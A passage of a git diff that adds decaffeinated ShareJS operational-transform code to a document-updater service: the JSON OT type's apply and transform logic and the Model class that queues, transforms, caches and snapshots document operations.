!== undefined || c.si !== undefined || c.sd !== undefined) { + // no change to structure + continue + } + const toRemove = [] + for (i = 0; i < this._listeners.length; i++) { + // Transform a dummy op by the incoming op to work out what + // should happen to the listener. + const l = this._listeners[i] + const dummy = { p: l.path, na: 0 } + const xformed = this.type.transformComponent([], dummy, c, 'left') + if (xformed.length === 0) { + // The op was transformed to noop, so we should delete the listener. + toRemove.push(i) + } else if (xformed.length === 1) { + // The op remained, so grab its new path into the listener. + l.path = xformed[0].p + } else { + throw new Error( + "Bad assumption in json-api: xforming an 'si' op will always result in 0 or 1 components." + ) + } + } + toRemove.sort((a, b) => b - a) + result.push( + (() => { + const result1 = [] + for (i of Array.from(toRemove)) { + result1.push(this._listeners.splice(i, 1)) + } + return result1 + })() + ) + } + return result + })() + }) + return this.on('remoteop', function (op) { + return (() => { + const result = [] + for (const c of Array.from(op)) { + const matchPath = + c.na === undefined ? c.p.slice(0, c.p.length - 1) : c.p + result.push( + (() => { + const result1 = [] + for (const { path, event, cb } of Array.from(this._listeners)) { + let common + if (pathEquals(path, matchPath)) { + switch (event) { + case 'insert': + if (c.li !== undefined && c.ld === undefined) { + result1.push(cb(c.p[c.p.length - 1], c.li)) + } else if (c.oi !== undefined && c.od === undefined) { + result1.push(cb(c.p[c.p.length - 1], c.oi)) + } else if (c.si !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.si)) + } else { + result1.push(undefined) + } + break + case 'delete': + if (c.li === undefined && c.ld !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.ld)) + } else if (c.oi === undefined && c.od !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.od)) + } else if (c.sd !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.sd)) + } else { + result1.push(undefined) + } + break + case 'replace': + if (c.li !== undefined && c.ld !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.ld, c.li)) + } else if (c.oi !== undefined && c.od !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.od, c.oi)) + } else { + result1.push(undefined) + } + break + case 'move': + if (c.lm !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.lm)) + } else { + result1.push(undefined) + } + break + case 'add': + if (c.na !== undefined) { + result1.push(cb(c.na)) + } else { + result1.push(undefined) + } + break + default: + result1.push(undefined) + } + } else if ( + (common = this.type.commonPath(matchPath, path)) != null + ) { + if (event === 'child op') { + if ( + matchPath.length === path.length && + path.length === common + ) { + throw new Error( + "paths match length and have commonality, but aren't equal?" + ) + } + const childPath = c.p.slice(common + 1) + result1.push(cb(childPath, c)) + } else { + result1.push(undefined) + } + } else { + result1.push(undefined) + } + } + return result1 + })() + ) + } + return result + })() + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/json.js b/services/document-updater/app/js/sharejs/types/json.js new file mode 100644 index 0000000..3422d61 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/json.js @@ -0,0 +1,630 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-useless-catch, +*/ +// TODO: This file was created by bulk-decaffeinate. 
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This is the implementation of the JSON OT type. +// +// Spec is here: https://github.com/josephg/ShareJS/wiki/JSON-Operations + +let text +if (typeof WEB !== 'undefined' && WEB !== null) { + ;({ text } = exports.types) +} else { + text = require('./text') +} + +const json = {} + +json.name = 'json' + +json.create = () => null + +json.invertComponent = function (c) { + const c_ = { p: c.p } + if (c.si !== undefined) { + c_.sd = c.si + } + if (c.sd !== undefined) { + c_.si = c.sd + } + if (c.oi !== undefined) { + c_.od = c.oi + } + if (c.od !== undefined) { + c_.oi = c.od + } + if (c.li !== undefined) { + c_.ld = c.li + } + if (c.ld !== undefined) { + c_.li = c.ld + } + if (c.na !== undefined) { + c_.na = -c.na + } + if (c.lm !== undefined) { + c_.lm = c.p[c.p.length - 1] + c_.p = c.p.slice(0, c.p.length - 1).concat([c.lm]) + } + return c_ +} + +json.invert = op => + Array.from(op.slice().reverse()).map(c => json.invertComponent(c)) + +json.checkValidOp = function (op) {} + +const isArray = o => Object.prototype.toString.call(o) === '[object Array]' +json.checkList = function (elem) { + if (!isArray(elem)) { + throw new Error('Referenced element not a list') + } +} + +json.checkObj = function (elem) { + if (elem.constructor !== Object) { + throw new Error( + `Referenced element not an object (it was ${JSON.stringify(elem)})` + ) + } +} + +json.apply = function (snapshot, op) { + json.checkValidOp(op) + op = clone(op) + + const container = { data: clone(snapshot) } + + try { + for (let i = 0; i < op.length; i++) { + const c = op[i] + let parent = null + let parentkey = null + let elem = container + let key = 'data' + + for (const p of Array.from(c.p)) { + parent = elem + parentkey = key + elem = elem[key] + key = p + + if (parent == null) { + throw new Error('Path invalid') + } + } + + if (c.na !== undefined) { + // Number add + if (typeof elem[key] !== 'number') { + throw new Error('Referenced element not a number') + } + elem[key] += c.na + } else if (c.si !== undefined) { + // String insert + if (typeof elem !== 'string') { + throw new Error( + `Referenced element not a string (it was ${JSON.stringify(elem)})` + ) + } + parent[parentkey] = elem.slice(0, key) + c.si + elem.slice(key) + } else if (c.sd !== undefined) { + // String delete + if (typeof elem !== 'string') { + throw new Error('Referenced element not a string') + } + if (elem.slice(key, key + c.sd.length) !== c.sd) { + throw new Error('Deleted string does not match') + } + parent[parentkey] = elem.slice(0, key) + elem.slice(key + c.sd.length) + } else if (c.li !== undefined && c.ld !== undefined) { + // List replace + json.checkList(elem) + + // Should check the list element matches c.ld + elem[key] = c.li + } else if (c.li !== undefined) { + // List insert + json.checkList(elem) + + elem.splice(key, 0, c.li) + } else if (c.ld !== undefined) { + // List delete + json.checkList(elem) + + // Should check the list element matches c.ld here too. + elem.splice(key, 1) + } else if (c.lm !== undefined) { + // List move + json.checkList(elem) + if (c.lm !== key) { + const e = elem[key] + // Remove it... + elem.splice(key, 1) + // And insert it back. 
+ elem.splice(c.lm, 0, e) + } + } else if (c.oi !== undefined) { + // Object insert / replace + json.checkObj(elem) + + // Should check that elem[key] == c.od + elem[key] = c.oi + } else if (c.od !== undefined) { + // Object delete + json.checkObj(elem) + + // Should check that elem[key] == c.od + delete elem[key] + } else { + throw new Error('invalid / missing instruction in op') + } + } + } catch (error) { + // TODO: Roll back all already applied changes. Write tests before implementing this code. + throw error + } + + return container.data +} + +// Checks if two paths, p1 and p2 match. +json.pathMatches = function (p1, p2, ignoreLast) { + if (p1.length !== p2.length) { + return false + } + + for (let i = 0; i < p1.length; i++) { + const p = p1[i] + if (p !== p2[i] && (!ignoreLast || i !== p1.length - 1)) { + return false + } + } + + return true +} + +json.append = function (dest, c) { + let last + c = clone(c) + if ( + dest.length !== 0 && + json.pathMatches(c.p, (last = dest[dest.length - 1]).p) + ) { + if (last.na !== undefined && c.na !== undefined) { + return (dest[dest.length - 1] = { p: last.p, na: last.na + c.na }) + } else if ( + last.li !== undefined && + c.li === undefined && + c.ld === last.li + ) { + // insert immediately followed by delete becomes a noop. + if (last.ld !== undefined) { + // leave the delete part of the replace + return delete last.li + } else { + return dest.pop() + } + } else if ( + last.od !== undefined && + last.oi === undefined && + c.oi !== undefined && + c.od === undefined + ) { + return (last.oi = c.oi) + } else if (c.lm !== undefined && c.p[c.p.length - 1] === c.lm) { + return null // don't do anything + } else { + return dest.push(c) + } + } else { + return dest.push(c) + } +} + +json.compose = function (op1, op2) { + json.checkValidOp(op1) + json.checkValidOp(op2) + + const newOp = clone(op1) + for (const c of Array.from(op2)) { + json.append(newOp, c) + } + + return newOp +} + +json.normalize = function (op) { + const newOp = [] + + if (!isArray(op)) { + op = [op] + } + + for (const c of Array.from(op)) { + if (c.p == null) { + c.p = [] + } + json.append(newOp, c) + } + + return newOp +} + +// hax, copied from test/types/json. Apparently this is still the fastest way to deep clone an object, assuming +// we have browser support for JSON. +// http://jsperf.com/cloning-an-object/12 +const clone = o => JSON.parse(JSON.stringify(o)) + +json.commonPath = function (p1, p2) { + p1 = p1.slice() + p2 = p2.slice() + p1.unshift('data') + p2.unshift('data') + p1 = p1.slice(0, p1.length - 1) + p2 = p2.slice(0, p2.length - 1) + if (p2.length === 0) { + return -1 + } + let i = 0 + while (p1[i] === p2[i] && i < p1.length) { + i++ + if (i === p2.length) { + return i - 1 + } + } +} + +// transform c so it applies to a document with otherC applied. 
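+// (Editor's worked example, not part of the original commit: two clients
+// insert into the same list index, and the 'left'/'right' argument breaks the
+// tie, shifting the right-hand insert past the left-hand one:
+//   json.transformComponent([], { p: [0], li: 'a' }, { p: [0], li: 'b' }, 'right')
+//     => [{ p: [1], li: 'a' }]
+// )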
+json.transformComponent = function (dest, c, otherC, type) { + let oc + c = clone(c) + if (c.na !== undefined) { + c.p.push(0) + } + if (otherC.na !== undefined) { + otherC.p.push(0) + } + + const common = json.commonPath(c.p, otherC.p) + const common2 = json.commonPath(otherC.p, c.p) + + const cplength = c.p.length + const otherCplength = otherC.p.length + + if (c.na !== undefined) { + c.p.pop() + } // hax + if (otherC.na !== undefined) { + otherC.p.pop() + } + + if (otherC.na) { + if ( + common2 != null && + otherCplength >= cplength && + otherC.p[common2] === c.p[common2] + ) { + if (c.ld !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.ld = json.apply(clone(c.ld), [oc]) + } else if (c.od !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.od = json.apply(clone(c.od), [oc]) + } + } + json.append(dest, c) + return dest + } + + if ( + common2 != null && + otherCplength > cplength && + c.p[common2] === otherC.p[common2] + ) { + // transform based on c + if (c.ld !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.ld = json.apply(clone(c.ld), [oc]) + } else if (c.od !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.od = json.apply(clone(c.od), [oc]) + } + } + + if (common != null) { + let from, p, to + const commonOperand = cplength === otherCplength + // transform based on otherC + if (otherC.na !== undefined) { + // this case is handled above due to icky path hax + } else if (otherC.si !== undefined || otherC.sd !== undefined) { + // String op vs string op - pass through to text type + if (c.si !== undefined || c.sd !== undefined) { + if (!commonOperand) { + throw new Error('must be a string?') + } + + // Convert an op component to a text op component + const convert = function (component) { + const newC = { p: component.p[component.p.length - 1] } + if (component.si) { + newC.i = component.si + } else { + newC.d = component.sd + } + return newC + } + + const tc1 = convert(c) + const tc2 = convert(otherC) + + const res = [] + text._tc(res, tc1, tc2, type) + for (const tc of Array.from(res)) { + const jc = { p: c.p.slice(0, common) } + jc.p.push(tc.p) + if (tc.i != null) { + jc.si = tc.i + } + if (tc.d != null) { + jc.sd = tc.d + } + json.append(dest, jc) + } + return dest + } + } else if (otherC.li !== undefined && otherC.ld !== undefined) { + if (otherC.p[common] === c.p[common]) { + // noop + if (!commonOperand) { + // we're below the deleted element, so -> noop + return dest + } else if (c.ld !== undefined) { + // we're trying to delete the same element, -> noop + if (c.li !== undefined && type === 'left') { + // we're both replacing one element with another. only one can + // survive! + c.ld = clone(otherC.li) + } else { + return dest + } + } + } + } else if (otherC.li !== undefined) { + if ( + c.li !== undefined && + c.ld === undefined && + commonOperand && + c.p[common] === otherC.p[common] + ) { + // in li vs. li, left wins. + if (type === 'right') { + c.p[common]++ + } + } else if (otherC.p[common] <= c.p[common]) { + c.p[common]++ + } + + if (c.lm !== undefined) { + if (commonOperand) { + // otherC edits the same list we edit + if (otherC.p[common] <= c.lm) { + c.lm++ + } + } + } + // changing c.from is handled above. 
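+      // (Editor's note: e.g. c = { p: [2], li: 'x' } transformed against
+      // otherC = { p: [1], li: 'y' } comes out as { p: [3], li: 'x' },
+      // because the other client's insert landed at or before our index.)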
+ } else if (otherC.ld !== undefined) { + if (c.lm !== undefined) { + if (commonOperand) { + if (otherC.p[common] === c.p[common]) { + // they deleted the thing we're trying to move + return dest + } + // otherC edits the same list we edit + p = otherC.p[common] + from = c.p[common] + to = c.lm + if (p < to || (p === to && from < to)) { + c.lm-- + } + } + } + + if (otherC.p[common] < c.p[common]) { + c.p[common]-- + } else if (otherC.p[common] === c.p[common]) { + if (otherCplength < cplength) { + // we're below the deleted element, so -> noop + return dest + } else if (c.ld !== undefined) { + if (c.li !== undefined) { + // we're replacing, they're deleting. we become an insert. + delete c.ld + } else { + // we're trying to delete the same element, -> noop + return dest + } + } + } + } else if (otherC.lm !== undefined) { + if (c.lm !== undefined && cplength === otherCplength) { + // lm vs lm, here we go! + from = c.p[common] + to = c.lm + const otherFrom = otherC.p[common] + const otherTo = otherC.lm + if (otherFrom !== otherTo) { + // if otherFrom == otherTo, we don't need to change our op. + + // where did my thing go? + if (from === otherFrom) { + // they moved it! tie break. + if (type === 'left') { + c.p[common] = otherTo + if (from === to) { + // ugh + c.lm = otherTo + } + } else { + return dest + } + } else { + // they moved around it + if (from > otherFrom) { + c.p[common]-- + } + if (from > otherTo) { + c.p[common]++ + } else if (from === otherTo) { + if (otherFrom > otherTo) { + c.p[common]++ + if (from === to) { + // ugh, again + c.lm++ + } + } + } + + // step 2: where am i going to put it? + if (to > otherFrom) { + c.lm-- + } else if (to === otherFrom) { + if (to > from) { + c.lm-- + } + } + if (to > otherTo) { + c.lm++ + } else if (to === otherTo) { + // if we're both moving in the same direction, tie break + if ( + (otherTo > otherFrom && to > from) || + (otherTo < otherFrom && to < from) + ) { + if (type === 'right') { + c.lm++ + } + } else { + if (to > from) { + c.lm++ + } else if (to === otherFrom) { + c.lm-- + } + } + } + } + } + } else if (c.li !== undefined && c.ld === undefined && commonOperand) { + // li + from = otherC.p[common] + to = otherC.lm + p = c.p[common] + if (p > from) { + c.p[common]-- + } + if (p > to) { + c.p[common]++ + } + } else { + // ld, ld+li, si, sd, na, oi, od, oi+od, any li on an element beneath + // the lm + // + // i.e. things care about where their item is after the move. 
+ from = otherC.p[common] + to = otherC.lm + p = c.p[common] + if (p === from) { + c.p[common] = to + } else { + if (p > from) { + c.p[common]-- + } + if (p > to) { + c.p[common]++ + } else if (p === to) { + if (from > to) { + c.p[common]++ + } + } + } + } + } else if (otherC.oi !== undefined && otherC.od !== undefined) { + if (c.p[common] === otherC.p[common]) { + if (c.oi !== undefined && commonOperand) { + // we inserted where someone else replaced + if (type === 'right') { + // left wins + return dest + } else { + // we win, make our op replace what they inserted + c.od = otherC.oi + } + } else { + // -> noop if the other component is deleting the same object (or any + // parent) + return dest + } + } + } else if (otherC.oi !== undefined) { + if (c.oi !== undefined && c.p[common] === otherC.p[common]) { + // left wins if we try to insert at the same place + if (type === 'left') { + json.append(dest, { p: c.p, od: otherC.oi }) + } else { + return dest + } + } + } else if (otherC.od !== undefined) { + if (c.p[common] === otherC.p[common]) { + if (!commonOperand) { + return dest + } + if (c.oi !== undefined) { + delete c.od + } else { + return dest + } + } + } + } + + json.append(dest, c) + return dest +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + if (!exports.types) { + exports.types = {} + } + + // This is kind of awful - come up with a better way to hook this helper code up. + exports._bt(json, json.transformComponent, json.checkValidOp, json.append) + + // [] is used to prevent closure from renaming types.text + exports.types.json = json +} else { + module.exports = json + + require('./helpers').bootstrapTransform( + json, + json.transformComponent, + json.checkValidOp, + json.append + ) +} diff --git a/services/document-updater/app/js/sharejs/types/model.js b/services/document-updater/app/js/sharejs/types/model.js new file mode 100644 index 0000000..af9fd0a --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/model.js @@ -0,0 +1,882 @@ +/* eslint-disable + no-console, + no-return-assign, + n/no-callback-literal, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS104: Avoid inline assignments + * DS204: Change includes calls to have a more natural evaluation order + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// The model of all the ops. Responsible for applying & transforming remote deltas +// and managing the storage layer. +// +// Actual storage is handled by the database wrappers in db/*, wrapped by DocCache + +let Model +const { EventEmitter } = require('node:events') + +const queue = require('./syncqueue') +const types = require('../types') + +const isArray = o => Object.prototype.toString.call(o) === '[object Array]' + +// This constructor creates a new Model object. There will be one model object +// per server context. +// +// The model object is responsible for a lot of things: +// +// - It manages the interactions with the database +// - It maintains (in memory) a set of all active documents +// - It calls out to the OT functions when necessary +// +// The model is an event emitter. 
It emits the following events: +// +// create(docName, data): A document has been created with the specified name & data +module.exports = Model = function (db, options) { + // db can be null if the user doesn't want persistance. + + let getOps + if (!(this instanceof Model)) { + return new Model(db, options) + } + + const model = this + + if (options == null) { + options = {} + } + + // This is a cache of 'live' documents. + // + // The cache is a map from docName -> { + // ops:[{op, meta}] + // snapshot + // type + // v + // meta + // eventEmitter + // reapTimer + // committedVersion: v + // snapshotWriteLock: bool to make sure writeSnapshot isn't re-entrant + // dbMeta: database specific data + // opQueue: syncQueue for processing ops + // } + // + // The ops list contains the document's last options.numCachedOps ops. (Or all + // of them if we're using a memory store). + // + // Documents are stored in this set so long as the document has been accessed in + // the last few seconds (options.reapTime) OR at least one client has the document + // open. I don't know if I should keep open (but not being edited) documents live - + // maybe if a client has a document open but the document isn't being edited, I should + // flush it from the cache. + // + // In any case, the API to model is designed such that if we want to change that later + // it should be pretty easy to do so without any external-to-the-model code changes. + const docs = {} + + // This is a map from docName -> [callback]. It is used when a document hasn't been + // cached and multiple getSnapshot() / getVersion() requests come in. All requests + // are added to the callback list and called when db.getSnapshot() returns. + // + // callback(error, snapshot data) + const awaitingGetSnapshot = {} + + // The time that documents which no clients have open will stay in the cache. + // Should be > 0. + if (options.reapTime == null) { + options.reapTime = 3000 + } + + // The number of operations the cache holds before reusing the space + if (options.numCachedOps == null) { + options.numCachedOps = 10 + } + + // This option forces documents to be reaped, even when there's no database backend. + // This is useful when you don't care about persistance and don't want to gradually + // fill memory. + // + // You might want to set reapTime to a day or something. + if (options.forceReaping == null) { + options.forceReaping = false + } + + // Until I come up with a better strategy, we'll save a copy of the document snapshot + // to the database every ~20 submitted ops. + if (options.opsBeforeCommit == null) { + options.opsBeforeCommit = 20 + } + + // It takes some processing time to transform client ops. The server will punt ops back to the + // client to transform if they're too old. + if (options.maximumAge == null) { + options.maximumAge = 40 + } + + // **** Cache API methods + + // Its important that all ops are applied in order. This helper method creates the op submission queue + // for a single document. This contains the logic for transforming & applying ops. + const makeOpQueue = (docName, doc) => + queue(function (opData, callback) { + if (!(opData.v >= 0)) { + return callback('Version missing') + } + if (opData.v > doc.v) { + return callback('Op at future version') + } + + // Punt the transforming work back to the client if the op is too old. 
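+      // (Editor's illustration: with the default maximumAge of 40, an op
+      // submitted at v=100 against a doc at v=150 fails the check below and
+      // is rejected with 'Op too old'.)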
+ if (opData.v + options.maximumAge < doc.v) { + return callback('Op too old') + } + + if (!opData.meta) { + opData.meta = {} + } + opData.meta.ts = Date.now() + + // We'll need to transform the op to the current version of the document. This + // calls the callback immediately if opVersion == doc.v. + return getOps(docName, opData.v, doc.v, function (error, ops) { + let snapshot + if (error) { + return callback(error) + } + + if (doc.v - opData.v !== ops.length) { + // This should never happen. It indicates that we didn't get all the ops we + // asked for. Its important that the submitted op is correctly transformed. + console.error( + `Could not get old ops in model for document ${docName}` + ) + console.error( + `Expected ops ${opData.v} to ${doc.v} and got ${ops.length} ops` + ) + return callback('Internal error') + } + + if (ops.length > 0) { + try { + // If there's enough ops, it might be worth spinning this out into a webworker thread. + for (const oldOp of Array.from(ops)) { + // Dup detection works by sending the id(s) the op has been submitted with previously. + // If the id matches, we reject it. The client can also detect the op has been submitted + // already if it sees its own previous id in the ops it sees when it does catchup. + if ( + oldOp.meta.source && + opData.dupIfSource && + Array.from(opData.dupIfSource).includes(oldOp.meta.source) + ) { + return callback('Op already submitted') + } + + opData.op = doc.type.transform(opData.op, oldOp.op, 'left') + opData.v++ + } + } catch (error1) { + error = error1 + return callback(error.message) + } + } + + try { + snapshot = doc.type.apply(doc.snapshot, opData.op) + } catch (error2) { + error = error2 + return callback(error.message) + } + + // The op data should be at the current version, and the new document data should be at + // the next version. + // + // This should never happen in practice, but its a nice little check to make sure everything + // is hunky-dory. + if (opData.v !== doc.v) { + // This should never happen. + console.error( + 'Version mismatch detected in model. File a ticket - this is a bug.' + ) + console.error(`Expecting ${opData.v} == ${doc.v}`) + return callback('Internal error') + } + + // newDocData = {snapshot, type:type.name, v:opVersion + 1, meta:docData.meta} + const writeOp = + (db != null ? db.writeOp : undefined) || + ((docName, newOpData, callback) => callback()) + + return writeOp(docName, opData, function (error) { + if (error) { + // The user should probably know about this. + console.warn(`Error writing ops to database: ${error}`) + return callback(error) + } + + __guardMethod__(options.stats, 'writeOp', o => o.writeOp()) + + // This is needed when we emit the 'change' event, below. + const oldSnapshot = doc.snapshot + + // All the heavy lifting is now done. Finally, we'll update the cache with the new data + // and (maybe!) save a new document snapshot to the database. + + doc.v = opData.v + 1 + doc.snapshot = snapshot + + doc.ops.push(opData) + if (db && doc.ops.length > options.numCachedOps) { + doc.ops.shift() + } + + model.emit('applyOp', docName, opData, snapshot, oldSnapshot) + doc.eventEmitter.emit('op', opData, snapshot, oldSnapshot) + + // The callback is called with the version of the document at which the op was applied. + // This is the op.v after transformation, and its doc.v - 1. + callback(null, opData.v) + + // I need a decent strategy here for deciding whether or not to save the snapshot. 
+ // + // The 'right' strategy looks something like "Store the snapshot whenever the snapshot + // is smaller than the accumulated op data". For now, I'll just store it every 20 + // ops or something. (Configurable with doc.committedVersion) + if ( + !doc.snapshotWriteLock && + doc.committedVersion + options.opsBeforeCommit <= doc.v + ) { + return tryWriteSnapshot(docName, function (error) { + if (error) { + return console.warn( + `Error writing snapshot ${error}. This is nonfatal` + ) + } + }) + } + }) + }) + }) + + // Add the data for the given docName to the cache. The named document shouldn't already + // exist in the doc set. + // + // Returns the new doc. + const add = function (docName, error, data, committedVersion, ops, dbMeta) { + let callback, doc + const callbacks = awaitingGetSnapshot[docName] + delete awaitingGetSnapshot[docName] + + if (error) { + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(error) + } + } + } else { + doc = docs[docName] = { + snapshot: data.snapshot, + v: data.v, + type: data.type, + meta: data.meta, + + // Cache of ops + ops: ops || [], + + eventEmitter: new EventEmitter(), + + // Timer before the document will be invalidated from the cache (if the document has no + // listeners) + reapTimer: null, + + // Version of the snapshot thats in the database + committedVersion: committedVersion != null ? committedVersion : data.v, + snapshotWriteLock: false, + dbMeta, + } + + doc.opQueue = makeOpQueue(docName, doc) + + refreshReapingTimeout(docName) + model.emit('add', docName, data) + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(null, doc) + } + } + } + + return doc + } + + // This is a little helper wrapper around db.getOps. It does two things: + // + // - If there's no database set, it returns an error to the callback + // - It adds version numbers to each op returned from the database + // (These can be inferred from context so the DB doesn't store them, but its useful to have them). + const getOpsInternal = function (docName, start, end, callback) { + if (!db) { + return typeof callback === 'function' + ? callback('Document does not exist') + : undefined + } + + return db.getOps(docName, start, end, function (error, ops) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + let v = start + for (const op of Array.from(ops)) { + op.v = v++ + } + + return typeof callback === 'function' ? callback(null, ops) : undefined + }) + } + + // Load the named document into the cache. This function is re-entrant. + // + // The callback is called with (error, doc) + const load = function (docName, callback) { + if (docs[docName]) { + // The document is already loaded. Return immediately. + __guardMethod__(options.stats, 'cacheHit', o => o.cacheHit('getSnapshot')) + return callback(null, docs[docName]) + } + + // We're a memory store. If we don't have it, nobody does. + if (!db) { + return callback('Document does not exist') + } + + const callbacks = awaitingGetSnapshot[docName] + + // The document is being loaded already. Add ourselves as a callback. + if (callbacks) { + return callbacks.push(callback) + } + + __guardMethod__(options.stats, 'cacheMiss', o1 => + o1.cacheMiss('getSnapshot') + ) + + // The document isn't loaded and isn't being loaded. Load it. 
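+    // (Editor's note: concurrent load() calls for the same doc while the db
+    // read below is in flight just push their callbacks onto
+    // awaitingGetSnapshot; add() then fans the single result out to all of
+    // them.)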
+ awaitingGetSnapshot[docName] = [callback] + return db.getSnapshot(docName, function (error, data, dbMeta) { + if (error) { + return add(docName, error) + } + + const type = types[data.type] + if (!type) { + console.warn(`Type '${data.type}' missing`) + return callback('Type not found') + } + data.type = type + + const committedVersion = data.v + + // The server can close without saving the most recent document snapshot. + // In this case, there are extra ops which need to be applied before + // returning the snapshot. + return getOpsInternal(docName, data.v, null, function (error, ops) { + if (error) { + return callback(error) + } + + if (ops.length > 0) { + console.log(`Catchup ${docName} ${data.v} -> ${data.v + ops.length}`) + + try { + for (const op of Array.from(ops)) { + data.snapshot = type.apply(data.snapshot, op.op) + data.v++ + } + } catch (e) { + // This should never happen - it indicates that whats in the + // database is invalid. + console.error(`Op data invalid for ${docName}: ${e.stack}`) + return callback('Op data invalid') + } + } + + model.emit('load', docName, data) + return add(docName, error, data, committedVersion, ops, dbMeta) + }) + }) + } + + // This makes sure the cache contains a document. If the doc cache doesn't contain + // a document, it is loaded from the database and stored. + // + // Documents are stored so long as either: + // - They have been accessed within the past #{PERIOD} + // - At least one client has the document open + function refreshReapingTimeout(docName) { + const doc = docs[docName] + if (!doc) { + return + } + + // I want to let the clients list be updated before this is called. + return process.nextTick(function () { + // This is an awkward way to find out the number of clients on a document. If this + // causes performance issues, add a numClients field to the document. + // + // The first check is because its possible that between refreshReapingTimeout being called and this + // event being fired, someone called delete() on the document and hence the doc is something else now. + if ( + doc === docs[docName] && + doc.eventEmitter.listeners('op').length === 0 && + (db || options.forceReaping) && + doc.opQueue.busy === false + ) { + let reapTimer + clearTimeout(doc.reapTimer) + return (doc.reapTimer = reapTimer = + setTimeout( + () => + tryWriteSnapshot(docName, function () { + // If the reaping timeout has been refreshed while we're writing the snapshot, or if we're + // in the middle of applying an operation, don't reap. + if ( + docs[docName].reapTimer === reapTimer && + doc.opQueue.busy === false + ) { + return delete docs[docName] + } + }), + options.reapTime + )) + } + }) + } + + function tryWriteSnapshot(docName, callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + const doc = docs[docName] + + // The doc is closed + if (!doc) { + return typeof callback === 'function' ? callback() : undefined + } + + // The document is already saved. + if (doc.committedVersion === doc.v) { + return typeof callback === 'function' ? callback() : undefined + } + + if (doc.snapshotWriteLock) { + return typeof callback === 'function' + ? callback('Another snapshot write is in progress') + : undefined + } + + doc.snapshotWriteLock = true + + __guardMethod__(options.stats, 'writeSnapshot', o => o.writeSnapshot()) + + const writeSnapshot = + (db != null ? 
db.writeSnapshot : undefined) ||
+      ((docName, docData, dbMeta, callback) => callback())
+
+    const data = {
+      v: doc.v,
+      meta: doc.meta,
+      snapshot: doc.snapshot,
+      // The database doesn't know about object types.
+      type: doc.type.name,
+    }
+
+    // Commit snapshot.
+    return writeSnapshot(docName, data, doc.dbMeta, function (error, dbMeta) {
+      doc.snapshotWriteLock = false
+
+      // We have to use data.v here because the version in the doc could
+      // have been updated between the call to writeSnapshot() and now.
+      doc.committedVersion = data.v
+      doc.dbMeta = dbMeta
+
+      return typeof callback === 'function' ? callback(error) : undefined
+    })
+  }
+
+  // *** Model interface methods
+
+  // Create a new document.
+  //
+  // data should be {snapshot, type, [meta]}. The version of a new document is 0.
+  this.create = function (docName, type, meta, callback) {
+    if (typeof meta === 'function') {
+      ;[meta, callback] = Array.from([{}, meta])
+    }
+
+    if (docName.match(/\//)) {
+      return typeof callback === 'function'
+        ? callback('Invalid document name')
+        : undefined
+    }
+    if (docs[docName]) {
+      return typeof callback === 'function'
+        ? callback('Document already exists')
+        : undefined
+    }
+
+    if (typeof type === 'string') {
+      type = types[type]
+    }
+    if (!type) {
+      return typeof callback === 'function'
+        ? callback('Type not found')
+        : undefined
+    }
+
+    const data = {
+      snapshot: type.create(),
+      type: type.name,
+      meta: meta || {},
+      v: 0,
+    }
+
+    const done = function (error, dbMeta) {
+      // dbMeta can be used to cache extra state needed by the database to access the document, like an ID or something.
+      if (error) {
+        return typeof callback === 'function' ? callback(error) : undefined
+      }
+
+      // From here on we'll store the object version of the type name.
+      data.type = type
+      add(docName, null, data, 0, [], dbMeta)
+      model.emit('create', docName, data)
+      return typeof callback === 'function' ? callback() : undefined
+    }
+
+    if (db) {
+      return db.create(docName, data, done)
+    } else {
+      return done()
+    }
+  }
+
+  // Permanently deletes the specified document.
+  // If listeners are attached, they are removed.
+  //
+  // The callback is called with (error) if there was an error. If error is null / undefined, the
+  // document was deleted.
+  //
+  // WARNING: This isn't well supported throughout the code. (Eg, streaming clients aren't told about the
+  // deletion. Subsequent op submissions will fail).
+  this.delete = function (docName, callback) {
+    const doc = docs[docName]
+
+    if (doc) {
+      clearTimeout(doc.reapTimer)
+      delete docs[docName]
+    }
+
+    const done = function (error) {
+      if (!error) {
+        model.emit('delete', docName)
+      }
+      return typeof callback === 'function' ? callback(error) : undefined
+    }
+
+    if (db) {
+      return db.delete(docName, doc != null ? doc.dbMeta : undefined, done)
+    } else {
+      return done(!doc ? 'Document does not exist' : undefined)
+    }
+  }
+
+  // This gets all operations from [start...end]. (That is, it's not inclusive.)
+  //
+  // end can be null. This means 'get me all ops from start'.
+  //
+  // Each op returned is in the form {op:o, meta:m, v:version}.
+  //
+  // Callback is called with (error, [ops])
+  //
+  // If the document does not exist, getOps doesn't necessarily return an error. This is because
+  // it's awkward to figure out whether or not the document exists for things
+  // like the redis database backend. I guess it's a bit gross having this inconsistent
+  // with the other DB calls, but it's certainly convenient.
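+  // An illustrative example of the half-open range: getOps('doc', 0, 3, cb)
+  // yields the ops with versions 0, 1 and 2 (version 3 is excluded), while
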